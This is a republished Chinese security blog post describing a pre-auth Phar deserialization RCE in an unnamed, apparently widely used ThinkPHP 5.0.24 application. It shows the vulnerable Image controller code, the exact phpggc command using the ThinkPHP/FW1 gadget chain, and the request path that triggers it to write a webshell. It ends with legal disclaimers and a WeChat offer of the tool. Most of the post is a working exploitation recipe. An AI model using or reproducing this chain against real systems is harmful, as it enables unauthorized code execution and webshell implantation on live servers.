【代码审计】记某次项目前台反序列化RCE漏洞研究

admin 2025年4月21日00:57:27评论2 views字数 1271阅读4分14秒阅读模式
【代码审计】记某次项目前台反序列化RCE漏洞研究

点击上方蓝字关注我们 并设为星标

0x01 过程

一套涉Zha的系统,名字就不给出了,貌似用的人还挺多.
该项目框架:ThinkPHP 5.0.24 Debug:True
【代码审计】记某次项目前台反序列化RCE漏洞研究
翻遍了所有代码,上传点都限制的比较死,只能传白名单里的后缀,SQL注入也基本没有,只能去找找别的地方.
【代码审计】记某次项目前台反序列化RCE漏洞研究
这时候看到位于 /application/api/controller/Image.php 控制器中的Image 方法存在file_get_contesnts函数,这不就来了么.
<?phpnamespace appapicontroller;use appcommoncontrollerApi as CommonController;final classImageextendsCommonController{protected $noNeedLogin = '*';protected $noNeedRight = '*';publicfunction_initialize()    {parent::_initialize();    }    public function image()    {        $imageData = file_get_contents(input('url'));        $image = imagecreatefromstring($imageData);        header("Content-Type: image/jpeg");        imagejpeg($image);        imagedestroy($image);        exit;    }}
众所周知,file_get_contents 文件不仅能读取文件,在ThinkPHP 5.0.24 中是可以触发Phar反序列化漏洞的.
【代码审计】记某次项目前台反序列化RCE漏洞研究

首先需要用phpggc 生成一个Phar反序列化包,用ThinkPHP/FW1 这个利用链,注意需要绝对路径打对,然后本地放一个aaa.php 这里是你要写入的内容 (phpggc 可能会出点问题,把出问题的利用链文件直接删除即可).

php.exe phpggc -p phar -o aaa.phar ThinkPHP/FW1 /www/wwwroot/xxxxx.com/public/ aaa.php
【代码审计】记某次项目前台反序列化RCE漏洞研究

这里上传点颇多,随便找个点传上去即可.

然后访问直接 /api/image/image?url=phar://./upload/图片地址.png 即可直接调用该利用链写入SHELL到其目录下

【代码审计】记某次项目前台反序列化RCE漏洞研究

http://192.168.200.128/3b58a9545013e88c7186db11bb158c44.php

【代码审计】记某次项目前台反序列化RCE漏洞研究

0x02 phpggc下载

标签:代码审计,0day,渗透测试,系统,通用,转转,Deepseek,AI

phpggc关注公众号,发送 250418 获取!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):【代码审计】记某次项目前台反序列化RCE漏洞研究

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月21日00:57:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【代码审计】记某次项目前台反序列化RCE漏洞研究https://cn-sec.com/archives/3975010.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息